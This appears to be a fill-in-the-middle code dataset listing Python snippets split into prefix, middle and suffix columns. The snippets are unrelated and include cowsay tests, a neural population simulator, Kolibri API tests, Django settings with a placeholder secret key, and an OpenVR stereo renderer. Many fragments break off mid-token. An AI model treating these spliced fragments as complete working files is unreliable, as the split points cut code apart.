prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
from __future__ import unicode_literals
#
# Copyright 2004 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#


class NotDAG(Exception):
    """Not a directed acyclic graph"""


class CantHappen(Exception):
    """Can't happen"""
# -*- coding: utf-8 -*-
from stash.tests.stashtest import StashTestCase


class CowsayTests(StashTestCase):
    """tests for cowsay"""

    def test_help(self):
        """test help output"""
        output = self.run_command("cowsay --help", exitcode=0)
        self.assertIn("cowsay", output)
        self.assertIn("--help", output)
        self.assertIn("usage:", output)

    def test_singleline_1(self):
        """test for correct text in output"""
        output = self.run_command("cowsay test", exitcode=0)
        self.assertIn("test", output)
        self.assertNotIn("Hello, World!", output)
        # a single line of text is framed by exactly one '<' and one '>'
        self.assertEqual(output.count("<"), 1)
        self.assertEqual(output.count(">"), 1)

    def test_singleline_2(self):
        """test for correct text in output"""
        # BUG FIX: this method was previously also named 'test_singleline_1',
        # which redefined (and silently shadowed) the test above, so the
        # first single-line test never ran. Renamed so both are collected.
        output = self.run_command("cowsay Hello, World!", exitcode=0)
        self.assertIn("Hello, World!", output)
        self.assertNotIn("test", output)
        self.assertEqual(output.count("<"), 1)
        self.assertEqual(output.count(">"), 1)

    def test_stdin_read(self):
        """test 'echo test | cowsay' printing 'test'"""
        output = self.run_command("echo test | cowsay", exitcode=0)
        self.assertIn("test", output)
        self.assertNotIn("Hello, World!", output)

    def test_stdin_ignore(self):
        """test 'echo test | cowsay Hello, World!' printing 'Hello World!'"""
        # command-line arguments take precedence over piped stdin
        output = self.run_command("echo test | cowsay Hello, World!", exitcode=0)
        self.assertIn("Hello, World!", output)
        self.assertNotIn("test", output)

    def test_multiline_1(self):
        """test for correct multiline output"""
        output = self.run_command("cowsay Hello,\\nWorld!", exitcode=0)
        self.assertIn("Hello,", output)
        self.assertIn("World!", output)
        # text should be split along the lines
        self.assertNotIn("Hello,\nWorld!", output)
        # multi-line bubbles use '/' and '\' corners instead of '<'/'>'
        self.assertIn("/", output)
        self.assertIn("\\", output)
        self.assertNotIn("<", output)
        self.assertNotIn(">", output)

    def test_multiline_2(self):
        """test for correct multiline output"""
        output = self.run_command("cowsay Hello,\\nWorld!\\nPython4Ever", exitcode=0)
        self.assertIn("Hello,", output)
        self.assertIn("World!", output)
        self.assertIn("Python4Ever", output)
        # text should be split along the lines
        self.assertNotIn("Hello,\nWorld!\nPython4Ever", output)
        # three-line bubbles additionally use '|' for the middle line(s)
        self.assertIn("/", output)
        self.assertIn("\\", output)
        self.assertIn("|", output)
        self.assertNotIn("<", output)
        self.assertNotIn(">", output)
1) Initializes the voltage edges (self.edges) and probability mass in each bin (self.pv), 2) Creates an initial dictionary of inputs into the population, and 3) Resets the recorder that tracks firing rate during a simulation. This method is called by the Simulation object (initialization method), but can also be called by a user when defining an alternative time stepping loop. ''' self.initialize_edges() self.initialize_probability() # TODO: different initialization options if self.record == True: self.initialize_firing_rate_recorder() self.initialize_callback(self) def update(self): '''Update the population one time step. This method is called by the Simulation object to update the population one time step. In turn, this method: 1) Calls the update_total_input_dict method to gather the current strengths of presynaptic input populations, 2) Calls the update_propability_mass method to propagate self.pv one time-step, 3) Calls the update_firing_rate method to compute the firing rate of the population based on flux over threshold, and 4) Calls the update_firing_rate_recorder method to register the current firing rate with the recorder. ''' self.update_total_input_dict() self.update_propability_mass() self.update_firing_rate() if self.record == True: self.update_firing_rate_recorder() logger.debug('GID(%s) Firing rate: %3.2f' % (self.gid, self.curr_firing_rate)) self.update_callback(self) def initialize_edges(self): '''Initialize self.edges and self.leak_flux_matrix attributes. This method initializes the self.edges attribute based on the v_min, v_max, and dv settings, and creates a corresponding leak flux matrix based on this voltage discretization. 
''' # Voltage edges and leak matrix construction self.tau_m = util.discretize_if_needed(self.tau_m) if np.sum(self.tau_m.xk <= 0) > 0: raise Exception('Negative tau_m values detected: %s' % self.tau_m.xk) # pragma: no cover # Voltage edges and leak matrix construction self.edges = util.get_v_edges(self.v_min, self.v_max, self.dv) # Different leak matrices for different solvers: self.leak_flux_matrix_dict = {} self.leak_flux_matrix_dict['dense'] = util.leak_matrix(self.edges, self.tau_m) # Backward Euler sparse: lfm_csrbe = sps.eye(np.shape(self.leak_flux_matrix_dict['dense'])[0], format='csr') - self.simulation.dt*self.leak_flux_matrix_dict['dense'] M_I, M_J = np.where(np.array(lfm_csrbe) != 0) M_val = lfm_csrbe[M_I, M_J] self.leak_flux_matrix_dict['sparse'] = (M_I, M_J, M_val) def initialize_probability(self): '''Initialize self.pv to delta-distribution at v=0.''' self.p0 = util.discretize_if_needed(self.p0) self.pv = util.get_pv_from_p0(self.p0, self.edges) util.assert_probability_mass_conserved(self.pv, 1e-15) def initialize_firing_rate_recorder(self): '''Initialize recorder at the beginning of a simulation. This method is typically called
by the initialize method rather than on its own. It resets the lists that track the firing rate during execution of the simulation. ''' # Set up firing rate recorder: if len(self.firing_rate_record) == 0: self.firing_rate_record.append(self.curr_firing_rate) if len(self.t_record) == 0: self.t_record.append(self.s
imulation.t) def initialize_total_input_dict(self): '''Initialize dictionary of presynaptic inputs at beginning of simulation This method is typically called by the initialize method rather than on its own. It creates a dictionary of synaptic inputs to the population. ''' # Aggregate input for each connection distribution: self.total_input_dict = {} for c in self.source_connection_list: try: curr_input = self.total_input_dict.setdefault(c.connection_distribution, 0) except: c.initialize_connection_distribution() curr_input = self.total_input_dict.setdefault(c.connection_distribution, 0) self.total_input_dict[c.connection_distribution] = curr_input + c.curr_delayed_firing_rate * c.nsyn def get_total_flux_matrix(self): '''Create a total flux matrix by summing presynaptic inputs and the leak matrix.''' total_flux_matrix = self.leak_flux_matrix_dict['dense'].copy() for key, val in self.total_input_dict.items(): try: total_flux_matrix += key.flux_matrix_dict['dense'] * val except: key.initialize() total_flux_matrix += key.flux_matrix_dict['dense'] * val return total_flux_matrix def update_total_input_dict(self): '''Update the input dictionary based on the current firing rates of presynaptic populations.''' # Initialize to zero: for curr_connection_distribution in self.total_input_dict.keys(): self.total_input_dict[curr_connection_distribution] = 0 for c in self.source_connection_list: self.total_input_dict[c.connection_distribution] += c.curr_delayed_firing_rate * c.nsyn def update_propability_mass(self): """Create a total flux matrix, and propogate self.pv one time-step.""" # import scipy.linalg as spla # import matplotlib.pyplot as plt # # if self.simulation.t > .09: # # for key, val in self.total_input_dict.items(): # print key, val # # evs = spla.eigvals(J*self.simulation.dt) # evs_re = np.real(evs) # evs_im = np.imag(evs) # plt.plot(evs_re, evs_im, '.') # plt.show() if self.update_method == 'exact': J = self.get_total_flux_matrix() self.pv = 
util.exact_update_method(J, self.pv, dt=self.simulation.dt) elif self.update_method == 'approx': J = self.get_total_flux_matrix() if self.approx_order == None: self.pv = util.approx_update_method_tol(J, self.pv, tol=self.tol, dt=self.simulation.dt, norm=self.norm) else: self.pv = util.approx_update_method_order(J, self.pv, approx_order=self.approx_order, dt=self.simulation.dt) elif self.update_method == 'gmres': self.update_propability_mass_backward_euler(lambda J, x0: spsla.gmres(J, x0, x0=x0, tol=self.tol)[0]) else: raise Exception('Unrecognized population update method: "%s"' % self.update_method) # pragma: no cover # Checking stability of if len(np.where(self.pv<0)[0]) != 0 or np.abs(np.abs(self.pv).sum() - 1) > 1e-15: self.pv[np.where(self.pv<0)] = 0 self.pv /= self.pv.sum() logger.critical('Normalizing Probability Mass') def update_propability_mass_backward_euler(self, solver): # Determine size of sparse array to construct total_size = len(self.leak_flux_matrix_dict['sparse'][0]) for key, val in self.total_input_dict.items(): try: total_size += len(key.flux_matrix_dict['sparse'][0]) except: key.initialize() total_size += len(key.flux_matrix_dict['sparse'][0]) M_I_total = np.empty(total_size) M_J_total = np.empty(total_size) M_val_total = np.empty(total_size) start_ind = 0 end_ind =
# -*- coding: utf-8 -*- # Copyright 2018 Novo Nordisk Foundation Center for Biosustainability, # Technical University of Denmark. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Provide an interface for growth experiments.""" from __future__ import absolute_import import logging from pandas import DataFrame from memote.experimental.experiment import Experiment __all__ = ("GrowthExperiment",) LOGGER = logging.getLogger(_
_name__) class GrowthExperiment(Experiment): """Represent a growth experiment.""" SCHEMA = "growth.json" def __init__(self, **kwargs): """ Initialize a growth experiment. Parameters ---------- kwargs """ super(GrowthExperiment, self).__init__(**kwargs) def load(self, dtype_conversion=None): """ Load the data table and corresponding validation schema. Parameters ------
---- dtype_conversion : dict Column names as keys and corresponding type for loading the data. Please take a look at the `pandas documentation <https://pandas.pydata.org/pandas-docs/stable/io.html#specifying-column-data-types>`__ for detailed explanations. """ if dtype_conversion is None: dtype_conversion = {"growth": str} super(GrowthExperiment, self).load(dtype_conversion=dtype_conversion) self.data["growth"] = self.data["growth"].isin(self.TRUTHY) def evaluate(self, model): """Evaluate in silico growth rates.""" with model: if self.medium is not None: self.medium.apply(model) if self.objective is not None: model.objective = self.objective model.add_cons_vars(self.constraints) growth = list() for row in self.data.itertuples(index=False): with model: exchange = model.reactions.get_by_id(row.exchange) if bool(exchange.reactants): exchange.lower_bound = -row.uptake else: exchange.upper_bound = row.uptake growth.append(model.slim_optimize() >= self.minimal_growth_rate) return DataFrame({"exchange": self.data["exchange"], "growth": growth})
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Author: Tania M. Molina
# UY - 2017
# MIT License

# Statistical analysis script: prompts for a CSV file and loads it into a
# pandas DataFrame for further processing (continuation not shown here).

# NOTE(review): scipy.stats is imported five separate times under different
# names below; later code presumably relies on some of these aliases, so
# none are removed here — verify which are actually used before cleaning up.
import math
import numpy as np
import pandas as pd
from scipy import stats
from scipy.stats import norm
# NOTE(review): this rebinds the name 'stats' that 'from scipy import stats'
# created above (same module object, so behavior is unchanged).
import scipy.stats as stats
import scipy.stats as st
import matplotlib
import matplotlib.pyplot as plt
import re
import scipy.stats
# NOTE(review): the alias 'mlab' here actually points at pyplot (same module
# as 'plt'), not matplotlib.mlab — possibly a mistake; confirm against usage.
import matplotlib.pyplot as mlab

# 'raw_input' exists only in Python 2; this script will raise NameError on
# Python 3 (where the equivalent builtin is 'input').
fhand = raw_input('Enter .csv file name or keyword: ')
# Read the CSV using its first row as the header.
data = pd.read_csv(fhand, header=0)
# read_csv already returns a DataFrame; this wrap is a no-op copy of it.
frame = pd.DataFrame(data)
import os import unittest import numpy as np from tfsnippet.examples.utils import MLResults from tfsnippet.utils import TemporaryDirectory def head_of_file(path, n): with open(path, 'rb') as f: return f.read(n) class MLResultTestCase(unittest.TestCase): def test_imwrite(self): with TemporaryDirectory() as tmpdir: results = MLResults(tmpdir) im = np.zeros([32, 32], dtype=np.uint8) im[16:, ...] = 255 results.save_image('test.bmp', im) file_path = os.path.join(tmpdir, 'test.bmp') self.assertTrue(os.path.isfile(file_path)) self.assertEqual(head_of_file(file_path, 2), b'\x42\x4d') results.save_image('test.png', im) file_path = os.path.join(tmpdir, 'test.png') self.assertTrue(os.path.isfile(file_path)) self.assertEqual(head_of_file(file_path, 8), b'\x89\x50\
x4e\x47\x0d\x0a\x1a\x0a') results.save_image('test.jpg', im) file_path = os.path.join(tmpdir, 'test.jpg') self.assertTrue(os.path.isfile(file_path)) self.assertEqual(head_of_file(file_path, 3), b'\xff\xd8\xf
f')
(self.admin) self.payload = {'user': self.user.pk, 'content_id': uuid.uuid4().hex, 'channel_id': uuid.uuid4().hex, 'kind': 'video', 'start_timestamp': str(datetime.datetime.now())} def test_contentsessionlog_list(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.get(reverse('contentsessionlog-list')) expected_count = ContentSessionLog.objects.count() self.assertEqual(len(response.data), expected_count) def test_contentsessionlog_detail(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) log_id = self.interaction_logs[0].id response = self.client.get(reverse('contentsessionlog-detail', kwargs={"pk": log_id})) log = ContentSessionLog.objects.get(pk=log_id) interaction_serializer = ContentSessionLogSerializer(log) self.assertEqual(response.data['content_id'], interaction_serializer.data['content_id']) def test_admin_can_create_contentsessionlog(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_learner_can_create_contentsessionlog(self): self.client.login(username=self.user.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_anonymous_user_cannot_create_contentsessionlog_for_learner(self): response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_anonymous_user_can_create_contentsessionlog(self): del self.payload['user'] response = self.client.post(reverse('contentsessionlog-list'), data=self.payload, format='json') 
self.assertEqual(response.status_code, status.HTTP_201_CREATED) class ContentSummaryLogAPITestCase(APITestCase): def setUp(self): # create DeviceOwner to pass the setup_wizard middleware check DeviceOwner.objects.create(username='test-device-owner', password=123) self.facility = FacilityFactory.create() self.admin = FacilityUserFactory.create(facility=self.facility) self.user = FacilityUserFactory.create(facility=self.facility) self.summary_logs = [ContentSummaryLogFactory.create(user=self.user) for _ in range(3)] self.facility.add_admin(self.admin) self.payload = {'user': self.user.pk, 'content_id': uuid.uuid4().hex, 'channel_id': uuid.uuid4().hex, 'kind': "video", 'start_timestamp': str(datetime.datetime.now())} def test_summarylog_list(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.get(reverse('contentsummarylog-list')) expected_count = ContentSummaryLog.objects.count() self.assertEqual(len(response.data), expected_count) def test_summarylog_detail(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) log_id = self.summary_logs[0].id response = self.client.get(reverse('contentsummarylog-detail', kwargs={"pk": log_id})) log = ContentSummaryLog.objects.get(pk=log_id) summary_serializer = ContentSummaryLogSerializer(log) self.assertEqual(response.data['content_id'], summary_serializer.data['content_id']) def test_admin_can_create_summarylog(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsummarylog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_learner_can_create_summarylog(self): self.client.login(username=self.user.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentsummarylog-list'), data=self.payload, format='json') 
self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_anonymous_user_cannot_create_summarylog_for_learner(self): response = self.client.post(reverse('contentsummarylog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) class ContentRatingLogAPITestCase(APITestCase): def setUp(self): # create DeviceOwner to pass the setup_wizard middleware check DeviceOwner.objects.create(username='test-device-owner', password=123) self.facility = FacilityFactory.create() self.admin = FacilityUserFactory.create(facility=self.facility) self.user = FacilityUserFactory.create(facility=self.facility) self.rating_logs = [ContentRatingLogFactory.create(user=self.user) for _ in range(3)] self.facility.add_admin(self.admin) self.payload = {'user': self.user.pk, 'content_id': uuid.uuid4().hex, 'channel_id': uuid.uuid4().hex} def test_ratinglog_list(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.get(reverse('contentratinglog-list')) expected_count = ContentRatingLog.objects.count() self.assertEqual(len(response.data), expected_count) def test_ratinglog_detail(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) log_id = self.rating_logs[0].id response = self.client.get(reverse('contentratinglog-detail', kwargs={"pk": log_id})) log = ContentRatingLog.objects.get(pk=log_id) rating_serializer = ContentRatingLogSerializer(log) self.assertEqual(response.data['content_id'], rating_serializer.data['content_id']) def test_admin_can_create_ratinglog(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(reverse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(respon
se.status_code, status.HTTP_201_CREATED) def test_learner_can_create_ratinglog(self): self.client.login(username=self.user.username, password=DUMMY_PASSWORD, facility=self.facility) response = self.client.post(rev
erse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_anonymous_user_cannot_create_ratinglog_for_learner(self): response = self.client.post(reverse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_anonymous_user_can_create_ratinglog(self): del self.payload['user'] response = self.client.post(reverse('contentratinglog-list'), data=self.payload, format='json') self.assertEqual(response.status_code, status.HTTP_201_CREATED) class UserSessionLogAPITestCase(APITestCase): def setUp(self): # create DeviceOwner to pass the setup_wizard middleware check DeviceOwner.objects.create(username='test-device-owner', password=123) self.facility = FacilityFactory.create() self.admin = FacilityUserFactory.create(facility=self.facility) self.user = FacilityUserFactory.create(facility=self.facility) self.session_logs = [UserSessionLogFactory.create(user=self.user) for _ in range(3)] self.facility.add_admin(self.admin) def test_sessionlog_l
project go here. LOCAL_APPS = ( 'users', # custom users app # Your stuff: custom apps go here ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS INSTALLED_APPS += ( # Needs to come last for now because of a weird edge case between # South and allauth 'allauth', # registration 'allauth.account', # registration 'allauth.socialaccount', # registration ) # END APP CONFIGURATION # MIDDLEWARE CONFIGURATION MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) # END MIDDLEWARE CONFIGURATION # DEBUG # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug DEBUG = values.BooleanValue(False) # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug TEMPLATE_DEBUG = DEBUG # END DEBUG # SECRET CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key # Note: This key only used for development and testing. # In production, this is changed to a values.SecretValue() setting SECRET_KEY = "CHANGEME!!!" 
# END SECRET CONFIGURATION # FIXTURE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS FIXTURE_DIRS = ( join(BASE_DIR, 'fixtures'), ) # END FIXTURE CONFIGURATION # EMAIL CONFIGURATION EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend') # END EMAIL CONFIGURATION # MANAGER CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins ADMINS = ( ('{{cookiecutter.author_name}}', '{{cookiecutter.email}}'), ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers MANAGERS = ADMINS # END MANAGER CONFIGURATION # DATABASE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases DATABASES = values.DatabaseURLValue('postgres://localhost/{{cookiecutter.repo_name}}') # END DATABASE CONFIGURATION # CACHING # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows. # memcacheify is what's used in Production CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': '' } } # END CACHING # GENERAL CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone TIME_ZONE = 'America/Los_Angeles' # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code LANGUAGE_CODE = 'en-us' # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id SITE_ID = 1 # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n USE_I18N = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n USE_L10N = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz USE_TZ = True # END GENERAL CONFIGURATION # TEMPLATE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors TEMPLATE_CONTEXT_PROCESSORS = ( 'django.contrib.auth.context_processors.auth', "allauth.account.context_processors.account", "allauth.socialaccount.context_processors.socialaccount", 
'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', 'django.core.context_processors.tz', 'django.contrib.messages.context_processors.messages', 'django.core.context_processors.request', # Your stuff: custom template context processers go here ) # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs TEMPLATE_DIRS = (
join(BASE_DIR, 'templates'), ) TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ) # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#tem
plate-packs CRISPY_TEMPLATE_PACK = 'bootstrap3' # END TEMPLATE CONFIGURATION # STATIC FILE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles') # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url STATIC_URL = '/static/' # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS STATICFILES_DIRS = ( join(BASE_DIR, 'static'), ) # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) # END STATIC FILE CONFIGURATION # MEDIA CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root MEDIA_ROOT = join(BASE_DIR, 'media') # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url MEDIA_URL = '/media/' # END MEDIA CONFIGURATION # URL Configuration ROOT_URLCONF = 'config.urls' # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application WSGI_APPLICATION = 'config.wsgi.application' # End URL Configuration # AUTHENTICATION CONFIGURATION AUTHENTICATION_BACKENDS = ( "django.contrib.auth.backends.ModelBackend", "allauth.account.auth_backends.AuthenticationBackend", ) # Some really nice defaults ACCOUNT_AUTHENTICATION_METHOD = "username" ACCOUNT_EMAIL_REQUIRED = True ACCOUNT_EMAIL_VERIFICATION = "mandatory" # END AUTHENTICATION CONFIGURATION # Custom user app defaults # Select the correct user model AUTH_USER_MODEL = "users.User" LOGIN_REDIRECT_URL = "users:redirect" LOGIN_URL = "account_login" # END Custom user app defaults # SLUGLIFIER AUTOSLUG_SLUGIFY_FUNCTION = "slugify.slugify" # END SLUGLIFIER # LOGGING CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging # A sample logging configuration. 
The only tangible logging # performed by this configuration is to send an email to # the site admins on every HTTP 500 error when DEBUG=False. # See http://docs.djangoproject.com/en/dev/topics/logging for # more details on how to customize your logging configuration. LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' } }, 'handlers': { 'mail_admins': { 'level': 'ERROR', 'filters': ['require_debug_false'], 'class': 'django.utils.log.AdminEmailHandler' } }, 'loggers': { 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, } } # END LOGGING CONFIGURATION # CELERY CONFIGURATION # See: http://docs.celeryproject.org/en/latest/configuration.html#broker-transport BROKER_TRANSPORT = 'amqp' # See: http://docs.celeryproject.org/en/latest/configuration.html#broker-pool-limit # and https://groups.google.com/forum/#!topic/celery-users/JWnh2LFux9o BROKER_POOL_LIMIT = 4 # See: http://docs.celeryproject.org/en/latest/configuration.html#celery-redirect-stdouts-level CELERY_REDIRECT_STDOUTS_LEVEL = 'DEBUG' # See: http://docs.celeryproje
# Copyright (c) 2016 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from alembic import context

from rally.common.db import api
from rally.common.db import models

# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
target_metadata = models.BASE.metadata

# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.


def run_migrations_online():
    """Run migrations in 'online' mode.

    In this scenario we need to create an Engine and associate a
    connection with the context.
    """
    db_engine = api.get_engine()
    with db_engine.connect() as conn:
        context.configure(
            connection=conn,
            render_as_batch=True,
            target_metadata=target_metadata,
        )
        with context.begin_transaction():
            context.run_migrations()


run_migrations_online()
from ctypes import c_float, cast, POINTER

import numpy as np
import OpenGL.GL as gl
import openvr
from openvr.gl_renderer import OpenVrFramebuffer as OpenVRFramebuffer
from openvr.gl_renderer import matrixForOpenVrMatrix as matrixForOpenVRMatrix
from openvr.tracked_devices_actor import TrackedDevicesActor

import gltfutils as gltfu

# Alias for casting OpenVR's pose-matrix storage to a float pointer.
c_float_p = POINTER(c_float)


class OpenVRRenderer(object):
    """Stereo renderer that draws glTF scene nodes into an OpenVR HMD.

    Owns the OpenVR system/compositor handles, one GL framebuffer per eye,
    and per-eye projection and eye-to-head matrices cached at init time.
    """

    def __init__(self, multisample=0, znear=0.1, zfar=1000):
        """Initialize OpenVR and allocate per-eye GL framebuffers.

        :param multisample: MSAA sample count forwarded to the framebuffers.
        :param znear: near clip plane distance for both eye projections.
        :param zfar: far clip plane distance for both eye projections.
        """
        self.vr_system = openvr.init(openvr.VRApplication_Scene)
        # Per-eye render target size recommended by the VR runtime.
        w, h = self.vr_system.getRecommendedRenderTargetSize()
        self.vr_framebuffers = (OpenVRFramebuffer(w, h, multisample=multisample),
                                OpenVRFramebuffer(w, h, multisample=multisample))
        self.vr_compositor = openvr.VRCompositor()
        if self.vr_compositor is None:
            raise Exception('unable to create compositor')
        self.vr_framebuffers[0].init_gl()
        self.vr_framebuffers[1].init_gl()
        # Pose array is refilled in place by waitGetPoses() every frame.
        poses_t = openvr.TrackedDevicePose_t * openvr.k_unMaxTrackedDeviceCount
        self.poses = poses_t()
        # Projections and inverted eye-to-head transforms are constant for
        # fixed znear/zfar, so compute them once here.
        # NOTE(review): the .I attribute implies matrixForOpenVRMatrix
        # returns np.matrix -- confirm against the installed openvr version.
        self.projection_matrices = (np.asarray(matrixForOpenVRMatrix(self.vr_system.getProjectionMatrix(openvr.Eye_Left, znear, zfar))),
                                    np.asarray(matrixForOpenVRMatrix(self.vr_system.getProjectionMatrix(openvr.Eye_Right, znear, zfar))))
        self.eye_transforms = (np.asarray(matrixForOpenVRMatrix(self.vr_system.getEyeToHeadTransform(openvr.Eye_Left)).I),
                               np.asarray(matrixForOpenVRMatrix(self.vr_system.getEyeToHeadTransform(openvr.Eye_Right)).I))
        # view holds the HMD pose as a 4x4; its top 3 rows are overwritten
        # each frame in render().
        self.view = np.eye(4, dtype=np.float32)
        # Preallocated per-eye view matrices, written in place per frame.
        self.view_matrices = (np.empty((4,4), dtype=np.float32),
                              np.empty((4,4), dtype=np.float32))
        self.controllers = TrackedDevicesActor(self.poses)
        self.controllers.show_controllers_only = False
        self.controllers.init_gl()
        self.vr_event = openvr.VREvent_t()

    def render(self, gltf, nodes, window_size=(800, 600)):
        """Render one stereo frame of the given glTF nodes and submit it.

        :param gltf: parsed glTF document, passed through to gltfutils.
        :param nodes: iterable of scene nodes to draw for each eye.
        :param window_size: (width, height) of the desktop mirror window.
        """
        # Blocks until the compositor hands back fresh tracked poses.
        self.vr_compositor.waitGetPoses(self.poses, openvr.k_unMaxTrackedDeviceCount, None, 0)
        hmd_pose = self.poses[openvr.k_unTrackedDeviceIndex_Hmd]
        if not hmd_pose.bPoseIsValid:
            # No valid tracking this frame: skip rendering entirely.
            return
        # Zero-copy view of the 3x4 device-to-absolute pose matrix.
        hmd_34 = np.ctypeslib.as_array(cast(hmd_pose.mDeviceToAbsoluteTracking.m, c_float_p), shape=(3,4))
        self.view[:3,:] = hmd_34
        # Invert the (transposed) HMD pose to obtain the view transform.
        view = np.linalg.inv(self.view.T)
        # Per-eye view matrices computed into the preallocated buffers.
        view.dot(self.eye_transforms[0], out=self.view_matrices[0])
        view.dot(self.eye_transforms[1], out=self.view_matrices[1])
        gl.glViewport(0, 0, self.vr_framebuffers[0].width, self.vr_framebuffers[0].height)
        for eye in (0, 1):
            gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, self.vr_framebuffers[eye].fb)
            gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
            # Reset gltfutils' cached GL state so the first draw of each
            # eye rebinds its material and technique.
            gltfu.set_material_state.current_material = None
            gltfu.set_technique_state.current_technique = None
            for node in nodes:
                gltfu.draw_node(node, gltf, projection_matrix=self.projection_matrices[eye], view_matrix=self.view_matrices[eye])
            self.controllers.display_gl(self.view_matrices[eye], self.projection_matrices[eye])
        self.vr_compositor.submit(openvr.Eye_Left, self.vr_framebuffers[0].texture)
        self.vr_compositor.submit(openvr.Eye_Right, self.vr_framebuffers[1].texture)
        # mirror left eye framebuffer to screen:
